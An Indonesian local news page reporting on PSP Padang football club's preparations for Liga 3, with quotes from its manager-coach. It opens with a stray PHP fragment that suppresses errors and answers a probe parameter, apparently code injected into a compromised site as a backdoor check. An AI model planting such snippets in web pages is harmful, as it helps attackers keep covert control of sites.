error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Jelang Liga 3 Ditabuh, PSP Padang Matangkan Persiapan - SMI.COM

Home / ADVETORIAL / MUSI BANYUASIN / Padang / SEPUTAR OLAHRAGA

Selasa, 10 Agustus 2021 - 22:06 WIB

Jelang Liga 3 Ditabuh, PSP Padang Matangkan Persiapan

PADANG,SMI

INVESTIGASI_PSP Padang, terus matangkan persiapan.
Klub legendaris Sumatera Barat itu, terus melakukan persiapan jelang bergulirnya Liga 3 Asprop(asosiasi provinsi).10-8-2021.

Hal tersebut di sampaikan oleh manager coach Jhoni Effendi di sela sela, ongobrol santai bersama komunitas para insan sepakbola Kota Padang.

“Ya, kita saat ini berusaha semaksimal mungkin untuk mempersiapkan tim secara matang. Walaupun kita tahu sendiri, jadwal Liga 3 belum dirilis oleh PSSI,” katanya

Ia juga mengatakan,
Sejauh ini kita berusaha semaksimal mungkin untuk mempersiapkan tim secara maksimal. “Komposisi materi pemain saat ini masih 70 % dan kita akan berusaha melengkapinya.
Kami beserta jajaran staf kepelatihan masih memerlukan beberapa pemain untuk mengisi sektor line,” ujarnya

Baca Juga :  Genap 352 Tahun, Wako Hendri Septa:  Kebersamaan Mari Kita Wujudkan Padang Tangguh, Unggul dan Berdaya Saing

Jhon Effendi juga menyebutkan, banyak yang harus kita benai agar PSP Padang dapat bersaing di kancah sepakbola Sumatera Barat maupun nasional

“Yang jelas perjuangan pasti sangat melelahkan. Kita sudah melakukan beberapa uji coba dengan klub kontestan liga askot PSSI Kota Padang dan kita akan evaluasi terus sampai tim ini benar benar matang sebelum tampil di liga 3,” tukuknya.

Disamping itu, lanjutnya, kami membutuhkan minimal 15 kali uji coba dengan level klub yang berbeda. Tujuannya, agar tim ini terukur baik secara tectical,mentalitas dan berbagai aspe,” tuturnya.

Baca Juga :  DONOR DARAH DALAMRANGKA HUT TNI KE 75

Asa kembali bangkit setelah PSSI pusat memberikan sinyal akan kembali mengulirkan kompetisi baik Liga 1, 2 dan 3. PSP Padang klub yang saat ini akan berjuang mengembalikan marwahnya di pentas sepakbola nasional, terus gencar melakukan persiapan.

Harapan kita, dukungan semua pihak agar kita bergotong royong, bahu membahu supaya PSP Padang dapat kembali kehabitatnya,” kata Jhon seraya menyebutkan PSP. Perlu dukungan kita bersama.(herman jetar)

Share :

Baca Juga

MUSI BANYUASIN

KORWIL V DIKBUD GELAR SOSIALISASI DANA BOS DAN BOSDA

MUSI BANYUASIN

Polres Muba Adakan Upacara Sertijab Dipimpin Kapolres Muba Akbp Alamsyah Pelupessy, SH, S.ik, M.si

MUSI BANYUASIN

Ketua DPRD Muratara Terima Kunjungan Rombongan Ketua DPRD MUBA

MUSI BANYUASIN

Tindak Lanjuti Arahan Presiden, Pemkab Muba Akan Terus Percepat Vaksinasi Covid-19

MUSI BANYUASIN

Himbauan Serta Bantuan Terus Dilakukan Polres Muba

MUSI BANYUASIN

2 Tahun Tidak Hidup, M Amin Sampaikan Di Paripurna

MUSI BANYUASIN

Dinkominfo Muba Maksimalkan Tata Kelola Pemerintahan Lewat Pelayanan Informasi Dinkominfo dan Bappeda Gelar Forum PD

MUSI BANYUASIN

Wujudkan Pelatih Profesional, PRSI Gelar Pelatihan Pelatih Renang, dan Polo Air